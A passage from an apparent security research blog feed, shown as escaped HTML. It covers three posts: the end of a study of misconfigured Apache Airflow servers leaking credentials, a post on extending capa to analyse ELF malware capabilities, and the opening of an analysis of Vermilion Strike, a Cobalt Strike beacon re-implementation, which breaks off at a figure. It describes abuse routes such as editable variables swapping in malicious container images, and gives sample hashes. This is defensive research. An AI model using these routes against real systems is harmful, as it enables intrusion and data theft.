&lt;li&gt;Variables – a way to store content and settings in a key value storage,
including passwords and API keys that are stored as masked strings. Airflow
also supports variable encryption using
&lt;a href="https://airflow.apache.org/docs/apache-airflow/stable/security/secrets/fernet.html#security-fernet"target="_blank" rel="noopener"&gt;Fernet&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Connections – A feature that stores parameters (username, password, host)
needed to connect to external systems.&lt;/li&gt;
&lt;li&gt;Logs – Airflow supports logging mechanisms as well as the ability to emit
metrics.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Version 1 of Airflow was released in
&lt;a href="https://github.com/apache/airflow/releases/tag/1.0.0"target="_blank" rel="noopener"&gt;2015&lt;/a&gt;. From the new web
server UI from version 1.10.0 many security changes were included, for
instance, removing the dangerous Ad Hoc query. In December 2020, version 2.0.0
was released and included many changes in functionality, performance, UI, and
security of the platform.&lt;/p&gt;
&lt;p&gt;Version 2 presents a new REST API that requires authentication for all
operations, including logging into the platform. Additionally, the logs do not
not contain sensitive information and specification of the Fernet key is
required for variable encryption. Finally, the configuration is adapted. This
means that several fields are deprecated and other settings require explicit
values rather than using default values. Most of our research is focused on the
older, less secure versions of Apache Airflow, which also emphasizes the risks
associated with procrastinating on making software updates.&lt;/p&gt;
&lt;h2&gt;Misconfiguration Risk&lt;span class="hx:absolute hx:-mt-20" id="misconfiguration-risk"&gt;&lt;/span&gt;
&lt;a href="#misconfiguration-risk" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Credential Exposure&lt;span class="hx:absolute hx:-mt-20" id="credential-exposure"&gt;&lt;/span&gt;
&lt;a href="#credential-exposure" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;One of the main risks of a misconfigured Airflow instance is the credentials
that are exposed with it. These credentials can give a threat actor access to
legitimate accounts and databases, with the ability to perform lateral
movement. If a large number of passwords are visible, a threat actor can also
use this data to detect patterns and common words to infer other passwords.
These can be leveraged in dictionary or brute-force-style attacks against other
platforms. Popular platforms that we found with exposed credentials as a result
of misconfigured Airflow instances include database passwords, API keys, and
cloud credentials. These include but are not limited to:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig1.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;Most of these credentials are exposed through insecure coding practices. We
document some of the ways in which the credentials have been exposed below.&lt;/p&gt;
&lt;h4&gt;Insecure Coding Practices&lt;span class="hx:absolute hx:-mt-20" id="insecure-coding-practices"&gt;&lt;/span&gt;
&lt;a href="#insecure-coding-practices" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The most common way to leak credentials in Airflow is through insecure coding
practices. We discovered many instances with hardcoded passwords inside the
Python DAG code. An example of a hardcoded password for a production PostgreSQL
database is shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig2.png" title="Hardcoded PostgreSQL password in DAG code." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Hardcoded PostgreSQL password in DAG code.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;Variables&lt;span class="hx:absolute hx:-mt-20" id="variables"&gt;&lt;/span&gt;
&lt;a href="#variables" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The next most common way for credentials to be leaked is through the
&amp;lsquo;variables&amp;rsquo; feature in Airflow. The variables feature allows a user to define a
variable value that is able to be globally used across all DAG scripts. It is
very common to see hardcoded passwords in these variables. An example of a
Slack token used in a variable is shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig3.png" title="Hardcoded Slack token in variables." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Hardcoded Slack token in variables.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;Connections&lt;span class="hx:absolute hx:-mt-20" id="connections"&gt;&lt;/span&gt;
&lt;a href="#connections" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Connections are the correct way to store credentials in Airflow. When a
connection with a password or token is added to Airflow, the password is
&lt;a href="https://airflow.apache.org/docs/apache-airflow/stable/howto/connection.html#securing-connections"target="_blank" rel="noopener"&gt;securely encrypted&lt;/a&gt;
in a database using the Fernet key. In some cases, this feature is misused and
the credentials are stored in the &lt;code&gt;Extra&lt;/code&gt; field of the connection in plaintext.
This means that they are not encrypted and can be viewed by anyone. An example
with an AWS key stored in the extra field is shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig4.png" title="AWS key located in misused connection." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;AWS key located in misused connection.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;Logs&lt;span class="hx:absolute hx:-mt-20" id="logs"&gt;&lt;/span&gt;
&lt;a href="#logs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;In versions of Airflow prior to 1.10.13, credentials added via the
&lt;a href="https://airflow.apache.org/docs/apache-airflow/stable/howto/connection.html#creating-a-connection-from-the-cli"target="_blank" rel="noopener"&gt;command line interface (CLI)&lt;/a&gt;
would be logged in plaintext in the logs section; now registered as
&lt;a href="https://www.cvedetails.com/cve/CVE-2020-17511/"target="_blank" rel="noopener"&gt;CVE-2020-17511&lt;/a&gt;. Below shows a
log entry for a SQL Lakehouse platform.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig5.png" title="Password located in logs." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Password located in logs.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;Configuration&lt;span class="hx:absolute hx:-mt-20" id="configuration"&gt;&lt;/span&gt;
&lt;a href="#configuration" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The configuration file (airflow.cfg) is created when Airflow is first started.
It contains Airflow&amp;rsquo;s configuration and it is able to be changed. This file can
contain sensitive information such as passwords and keys. If the setting in the
file &lt;code&gt;expose_config&lt;/code&gt; is set to &lt;code&gt;True&lt;/code&gt;, anyone can access the configuration from
the web server UI. Accessing from the UI can expose credentials. It is common
to see plaintext fernet keys in these files as shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig6.png" title="Key located in exposed configuration file." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Key located in exposed configuration file.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Leakage of Sensitive Data&lt;span class="hx:absolute hx:-mt-20" id="leakage-of-sensitive-data"&gt;&lt;/span&gt;
&lt;a href="#leakage-of-sensitive-data" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Many Airflow instances contain sensitive information. When these instances are
exposed to the internet the information becomes accessible to everyone, since
the authentication is disabled.&lt;/p&gt;
&lt;p&gt;Leakage of sensitive data essentially means that attackers have access to
information on the organization that owns the exposed server. They can steal
and use the information in many ways. For example, attackers can use leaked
information to gather more information about the organization (reconnaissance
stage as defined in
&lt;a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html"target="_blank" rel="noopener"&gt;The Cyber Kill Chain®&lt;/a&gt;)
and launch an attack that is tailored towards that organization. Leaked
information can also reveal details about the compromised organization&amp;rsquo;s
clients. The consequences of data leakage can lead to serious reputational
damage for the company and the potential loss of existing and potential new
clients.&lt;/p&gt;
&lt;p&gt;In versions prior to v1.10 of Airflow, there is a feature that lets users run
Ad Hoc database queries and get results from the database. While this feature
can be handy, it is also very dangerous because on top of there being no
authentication, anyone with access to the server can get information from the
database.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig7.png" title="Screenshot of the Ad Hoc Query feature in Airflow UI." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Screenshot of the Ad Hoc Query feature in Airflow UI.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Many exposed Airflow instances that we found revealed information about the
services and platforms that companies are using in their software development
environments. For example, several instances included the private names of
Docker images or internal dependencies used in the workflow. Exposing
information about tools and packages used in the organization&amp;rsquo;s infrastructure
can jeopardize the organization and also be leveraged by threat actors in
supply chain attacks. This can lead to attacks that leverage dependency or
image short names to deliver malicious code instead of the intended code. A
really good example of this type of attack is covered
&lt;a href="https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610"target="_blank" rel="noopener"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig8.png" title="Private container registry." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Private container registry.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Legal Action&lt;span class="hx:absolute hx:-mt-20" id="legal-action"&gt;&lt;/span&gt;
&lt;a href="#legal-action" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Exposing customer information can also lead to violation of data protection
laws and the possibility of legal action. One such data protection law is
General Data Protection Regulation (GDPR), which applies to organizations
handling the data of European citizens or any entities located in the European
Union (EU). Violating this law by leaking sensitive customer information can
lead to sizable administrative fines.&lt;/p&gt;
&lt;p&gt;Disruption of clients&amp;rsquo; operations through poor cybersecurity practices can also
result in legal action such as class action lawsuits. In the May 2021 Colonial
Pipeline hack, consumers that had their business disrupted
&lt;a href="https://www.washingtonpost.com/technology/2021/07/25/ransomware-class-action-lawsuit/"target="_blank" rel="noopener"&gt;filed class action lawsuits&lt;/a&gt;
against Colonial Pipeline.&lt;/p&gt;
&lt;h3&gt;Malware&lt;span class="hx:absolute hx:-mt-20" id="malware"&gt;&lt;/span&gt;
&lt;a href="#malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;There is also the possibility that Airflow plugins or features can be abused to
run malicious code. An example of how an attacker can abuse a native
&amp;lsquo;Variables&amp;rsquo; feature in Airflow is if any code or images placed in the variables
form is used to build evaluated code strings.&lt;/p&gt;
&lt;p&gt;Variables are able to be edited by any visiting user which means that malicious
code could be injected. One entity we observed was using variables to store
internal container image names to execute. These container image variables
could be edited and swapped out with an image containing and running
unauthorized or malicious code.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig9.png" title="Image name variables vulnerable to exploitation." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Image name variables vulnerable to exploitation.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Another possible route for malicious code execution can come through unofficial
third-party plugins. In some instances, we noticed that the plugin
&lt;a href="https://github.com/andreax79/airflow-code-editor"target="_blank" rel="noopener"&gt;&lt;code&gt;airflow-code-editor&lt;/code&gt;&lt;/a&gt; was
being used. This can be leveraged to edit DAGs to include malicious code that
can then be triggered from the UI. Of all the exposed instances, we noted only
a small percentage using these types of vulnerable plugins.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/images/fig10.png" title="Vulnerable code editor plugin." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Vulnerable code editor plugin.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Mitigation&lt;span class="hx:absolute hx:-mt-20" id="mitigation"&gt;&lt;/span&gt;
&lt;a href="#mitigation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Versioning&lt;span class="hx:absolute hx:-mt-20" id="versioning"&gt;&lt;/span&gt;
&lt;a href="#versioning" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Airflow made great progress in terms of security features implemented in
version 2.0. The changes included the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The dangerous Ad Hoc query was removed from the GUI.&lt;/li&gt;
&lt;li&gt;The logs do not leak information.&lt;/li&gt;
&lt;li&gt;Enforced login and authentication required for all operations in the REST
API.&lt;/li&gt;
&lt;li&gt;Security tab was added to the dashboard. It provides information about users
and the permissions they have for each menu in the dashboard.&lt;/li&gt;
&lt;li&gt;The configuration file is more strict and requires explicit specifications of
configuration values rather than using default values.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In light of the major changes made in version 2, it is strongly recommended to
update the version of all Airflow instances to the latest version. Make sure
that only authorized users can connect.&lt;/p&gt;
&lt;h3&gt;Secure Coding Practices&lt;span class="hx:absolute hx:-mt-20" id="secure-coding-practices"&gt;&lt;/span&gt;
&lt;a href="#secure-coding-practices" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Secure coding practices should be adopted whenever possible. Passwords should
not be hardcoded and the long names of images and dependencies should be
utilized. You will not be protected when using poor coding practices even if
you believe the application is firewalled off to the internet.&lt;/p&gt;
&lt;p&gt;The connections should be utilized in the proper way specified by Airflow for
maximum security. That process for managing connections is documented
&lt;a href="https://airflow.apache.org/docs/apache-airflow/stable/howto/connection.html"target="_blank" rel="noopener"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If there is sensitive information that can not be placed within the
connections, consider using environment variables instead.&lt;/p&gt;
&lt;h2&gt;Detecting Attackers Exploiting Misconfigurations&lt;span class="hx:absolute hx:-mt-20" id="detecting-attackers-exploiting-misconfigurations"&gt;&lt;/span&gt;
&lt;a href="#detecting-attackers-exploiting-misconfigurations" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Misconfigurations and broken access control are among the top reasons for
access to unauthorized functionality and data. If you don&amp;rsquo;t believe us, check
out our research about misconfigurations in another popular workflow platform
called
&lt;a href="https://intezer.com/blog/container-security/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/"target="_blank" rel="noopener"&gt;Argo Workflows&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In the event that an attacker has already exploited a misconfiguration or
vulnerability, you will need to detect and terminate the malicious or
unauthorized code in your production environment as soon as it is executed.&lt;/p&gt;</description></item><item><title>Teaching Capa New Tricks: Analyzing Capabilities in PE and ELF Files</title><link>https://research.intezer.com/blog/2021/09/analyzing-capabilities-in-pe-and-elf-files/</link><pubDate>Wed, 15 Sep 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/09/analyzing-capabilities-in-pe-and-elf-files/</guid><description>
&lt;h2&gt;Introduction&lt;span class="hx:absolute hx:-mt-20" id="introduction"&gt;&lt;/span&gt;
&lt;a href="#introduction" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;When analyzing malware, one of the goals in addition to identifying what
malware it is, is to understand what it does when it runs on a machine. There
are multiple ways of achieving this by either manual analysis, which requires
reverse engineering skills, or automated analysis. With Intezer Analyze we
provide a tool that aids both advanced reverse engineers and entry-level
analysts with the task of analyzing any suspicious file. Earlier this year we
&lt;a href="https://intezer.com/blog/get-more-context-with-ttps/"target="_blank" rel="noopener"&gt;announced&lt;/a&gt; a new feature
in Intezer Analyze that extracts the capabilities of a file. From the
capabilities, you can map these to known Tactics, Techniques, and Procedures
(TTPs). Under the hood, the functionality is powered by an open-source project
from FireEye called &lt;a href="https://github.com/fireeye/capa"target="_blank" rel="noopener"&gt;capa&lt;/a&gt;. Capa analyzes
Windows portable executable (PE) files and matches the findings against a rule
set to determine a file&amp;rsquo;s capability. Intezer Analyze is not limited to PE
files. It can also detect code reuse between Executable and Linkable Format
(ELF) files. With this in mind, we wanted to provide similar information for
ELF files. To achieve this, we extended capa support to ELF files and also
created rules for Linux ELFs. Since capa is an open-source project, we
&lt;a href="https://www.fireeye.com/blog/threat-research/2021/09/elfant-in-the-room-capa-v3.html"target="_blank" rel="noopener"&gt;submitted the changes&lt;/a&gt;
to the capa project to allow not only users of Analyze to take advantage of
this new functionality but also users of capa. So let&amp;rsquo;s explore how we can use
these new features in Intezer Analyze when investigating both PE and ELF files.&lt;/p&gt;
&lt;h2&gt;Supercharge Code Reuse with Capabilities&lt;span class="hx:absolute hx:-mt-20" id="supercharge-code-reuse-with-capabilities"&gt;&lt;/span&gt;
&lt;a href="#supercharge-code-reuse-with-capabilities" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;One beautiful marriage is the use of capabilities extracted by capa and
malicious code reuse (aka code genes) detected by Intezer Analyze. At Intezer,
we have a vast gene database of both known malicious code and code from trusted
vendors. This allows for the detection of different malware versions but also
detects when code is shared between different malware families. This can be
used to attribute new malware to previously known threats. Another strength of
code genes is that it allows for the determination of which functionality is
shared between different malware via code reuse. In biology, genes serve as the
blueprint for proteins and the proteins affect what a cell will do. A parallel
can be drawn to computer code. What a file will do, is dependent on its
capability. The capabilities are &amp;ldquo;codified&amp;rdquo; in its code genes. What this means
is that by connecting capabilities to code genes, we can detect that a
capability is shared between different malware families, thus making a strong
connection between them. To see this in action, let&amp;rsquo;s look at a practical
example. The following example uses one of the Olympic Destroyer samples
(&lt;a href="https://analyze.intezer.com/files/3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2"target="_blank" rel="noopener"&gt;&lt;code&gt;3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2&lt;/code&gt;&lt;/a&gt;)
that was part of Cisco Talos'
&lt;a href="https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"target="_blank" rel="noopener"&gt;report&lt;/a&gt;.
Olympic Destroyer is a good example because of all the false flags planted by
the threat actor. If we analyze the sample, you can see that it drops a number
of other files. The analysis of one of these files is shown in Figure 1.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/analyzing-capabilities-in-pe-and-elf-files/images/fig1.png" title="Figure 1: Analysis of one of the dropped files by the Olympic Destroyer sample (3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2)." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Analysis of one of the dropped files by the Olympic Destroyer sample (3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2).&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The gene summary shows that the file shares code with Olympic Destroyer and
TeleBots. Looking at the related samples to Olympic Destroyer, Figure 2, is the
&amp;ldquo;System Stealer&amp;rdquo; from the Cisco Talos report. According to the report, the
stealer attempts to obtain credentials from LSASS. The technique used is
similar to Mimikatz. From the gene summary, we can see that it does not share
code with Mimikatz.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/analyzing-capabilities-in-pe-and-elf-files/images/fig2.png" title="Figure 2: Olympic Destroyer related sample found is the system stealer (f188abc33d351c2254d794b525c5a8b79ea78acd3050cd8d27d3ecfc568c2936) from the original Cisco Talos report." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: Olympic Destroyer related sample found is the system stealer (f188abc33d351c2254d794b525c5a8b79ea78acd3050cd8d27d3ecfc568c2936) from the original Cisco Talos report.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If we look at the related TeleBots samples, we can see (Figure 3) that they
share code with a sample labeled XData. XData was a ransomware that targeted
Ukraine a month before the
&lt;a href="../../../2021/09/notpetya-returns-bad-rabbit/"&gt;NotPetya&lt;/a&gt; incident. According
to an ESET
&lt;a href="https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/"target="_blank" rel="noopener"&gt;report&lt;/a&gt;,
the malware was launched just after M.E.Doc had been executed on the machine,
suggesting that the same supply chain vector as NotPetya was used. XData,
according to ESET, had an embedded DLL that performed credential harvesting
like Mimikatz.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/analyzing-capabilities-in-pe-and-elf-files/images/fig3.png" title="Figure 3: TeleBots related samples show that the samples share code with an XData sample." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 3: TeleBots related samples show that the samples share code with an XData sample.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The connection between the two malware families can be made stronger by looking
at the functionality of the code that was reused. This you can do in Intezer
Analyze by looking at the capabilities that share genes between the TeleBots
sample and the Olympic Destroyer sample. The result is shown in Figure 4, where
you can see that the shared code is for the allocation of read-write-execute
memory. This is used by malware, for example, as part of unpacking or
decrypting payloads or for injecting into another process. What this is telling
us is that XData and Olympic Destroyer share a unique code that is used as part
of the allocation of read-write-execute memory.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/analyzing-capabilities-in-pe-and-elf-files/images/fig4.png" title="Figure 4: Capabilities with shared code genes between the Olympic Destroyer sample and XData." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 4: Capabilities with shared code genes between the Olympic Destroyer sample and XData.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Analyzing Capabilities of ELF Files&lt;span class="hx:absolute hx:-mt-20" id="analyzing-capabilities-of-elf-files"&gt;&lt;/span&gt;
&lt;a href="#analyzing-capabilities-of-elf-files" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Capa is a great tool for extracting capabilities of files and until now it only
supported PE files. To provide the same functionality for ELF files in Intezer
Analyze, we expanded capa&amp;rsquo;s functionality. Intezer Analyze has been supporting
ELFs for some time now but with the release of
&lt;a href="https://www.fireeye.com/blog/threat-research/2021/09/elfant-in-the-room-capa-v3.html"target="_blank" rel="noopener"&gt;capa v3.0&lt;/a&gt;,
which includes our improvements and rules for Linux ELFs, similar capability
extraction can be performed by using capa. As with Windows PE capability
detection, Intezer Analyze also correlates detected capabilities to code genes
for ELFs. This means a similar approach can be applied as documented above when
it comes to analyzing code reuse and capabilities. Figure 5 shows the
capabilities detected for a RedXOR sample that we released a
&lt;a href="../../../2021/03/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/"&gt;report&lt;/a&gt;
on earlier this year. From what we can see in the table under the TTPs tab, the
way the capabilities have been implemented is unique to RedXOR.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/analyzing-capabilities-in-pe-and-elf-files/images/fig5.png" title="Figure 5: Capabilities of a RedXOR sample detected by capa." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 5: Capabilities of a RedXOR sample detected by capa.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;ELF malware are sometimes statically linked. This means that libraries used by
the malware are included in the binary. That way, the malware doesn&amp;rsquo;t have to
depend on the infected machine to have the correct version of the library that
the malware expects, which allows the malware to run on multiple Linux
distributions. This can cause some detection of capabilities that are part of a
shared library and not the actual malware. This can be detected in the
capabilities table under TTPs in Intezer Analyze. Figure 6 shows some of the
capabilities detected for a malware called TSCookie. TSCookie is a backdoor
used by BlackTech and the Linux version was first
&lt;a href="https://blogs.jpcert.or.jp/en/2020/03/elf-tscookie.html"target="_blank" rel="noopener"&gt;reported&lt;/a&gt; on by
JPCert. The table shows the detection of &amp;ldquo;calculate modulo 256 via x86
assembly&amp;rdquo; and that the same genes are shared between BlackTech, Bifrost, and
libc. What this allows analysts to deduce is that the shared genes between
BlackTech and Bifrost exist because their malware has been statically linked
against the same libc version.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/analyzing-capabilities-in-pe-and-elf-files/images/fig6.png" title="Figure 6: Some of the capabilities for a TSCookie sample." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 6: Some of the capabilities for a TSCookie sample.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;span class="hx:absolute hx:-mt-20" id="conclusion"&gt;&lt;/span&gt;
&lt;a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Code gene analysis is a great way to find shared code between different malware
families. By correlating code genes to the capabilities of a file, you can add
another dimension to your malware analysis. In addition to Windows PE files,
Intezer Analyze now allows this to be performed on Linux ELF files. This was
possible by extending the functionality of an open-source project called capa.
We are grateful that FireEye open-sourced capa as it allowed us to extend its
functionality to support ELF files. As we are not only users of open-source, we
also enjoy providing improvements and bug fixes to open-source projects.
Additionally, we also have
&lt;a href="https://github.com/intezer"target="_blank" rel="noopener"&gt;released some of our own&lt;/a&gt;. Check out FireEye&amp;rsquo;s
blog post on capa v3.0 release
&lt;a href="https://www.fireeye.com/blog/threat-research/2021/09/elfant-in-the-room-capa-v3.html"target="_blank" rel="noopener"&gt;here&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>Vermilion Strike: Linux and Windows Re-implementation of Cobalt Strike</title><link>https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/</link><pubDate>Mon, 13 Sep 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/</guid><description>
&lt;h2&gt;Key Findings&lt;span class="hx:absolute hx:-mt-20" id="key-findings"&gt;&lt;/span&gt;
&lt;a href="#key-findings" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Discovered Linux &amp;amp; Windows re-implementation of Cobalt Strike Beacon written
from scratch&lt;/li&gt;
&lt;li&gt;Linux malware is fully undetected by vendors&lt;/li&gt;
&lt;li&gt;Has IoC and technical overlaps with previously discovered Windows DLL files&lt;/li&gt;
&lt;li&gt;Highly targeted with victims including telecommunications, government and
finance&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="../../../2021/08/cobalt-strike-detect-this-persistent-threat"&gt;Cobalt Strike&lt;/a&gt;
is a popular red team tool for Windows which is also heavily used by threat
actors. At the time of this writing, there is no official
&lt;a href="https://blog.cobaltstrike.com/2016/03/23/linux-left-out-in-the-cold/"target="_blank" rel="noopener"&gt;Cobalt Strike version for Linux&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In August 2021, we at Intezer discovered a
&lt;a href="https://analyze.intezer.com/files/294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc"target="_blank" rel="noopener"&gt;fully undetected ELF implementation&lt;/a&gt;
of Cobalt Strike&amp;rsquo;s &lt;a href="https://www.cobaltstrike.com/help-beacon"target="_blank" rel="noopener"&gt;beacon&lt;/a&gt;, which we
named &lt;strong&gt;Vermilion Strike&lt;/strong&gt;. The stealthy sample uses Cobalt Strike&amp;rsquo;s Command
and Control (C2) protocol when communicating to the C2 server and has Remote
Access capabilities such as uploading files, running shell commands and writing
to files. The malware is fully undetected in VirusTotal at the time of this
writing and was uploaded from Malaysia.&lt;/p&gt;
&lt;p&gt;Based on telemetry with collaboration from our partners at McAfee Enterprise
ATR, this Linux threat has been active in the wild since August targeting
telecom companies, government agencies, IT companies, financial institutions
and advisory companies around the world. Targeting has been limited in scope,
suggesting that this malware is used in specific attacks rather than mass
spreading.&lt;/p&gt;
&lt;p&gt;After further analysis, we found Windows samples that use the same C2. The
samples are re-implementations of Cobalt Strike Beacon. The Windows and ELF
samples share the same functionalities.&lt;/p&gt;
&lt;p&gt;The sophistication of this threat, its intent to conduct espionage, and the
fact that the code hasn&amp;rsquo;t been seen before in other attacks, together with the
fact that it targets specific entities in the wild, leads us to believe that
this threat was developed by a skilled threat actor.&lt;/p&gt;
&lt;p&gt;In this post we will provide a technical analysis of the samples and explain
how you can detect and respond to this threat.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Linux File&lt;span class="hx:absolute hx:-mt-20" id="linux-file"&gt;&lt;/span&gt;
&lt;a href="#linux-file" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The file was uploaded to VirusTotal from Malaysia and has no detections in
VirusTotal at the time of this writing.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/09/vermilionstrike-reimplementation-cobaltstrike/images/fig1.png" title="294b8db1f2702b60fb2e42fdc50c2cee6a5046112da9a5703a548a4fa50477bc in VirusTotal" alt="" loading="lazy" /&gt;
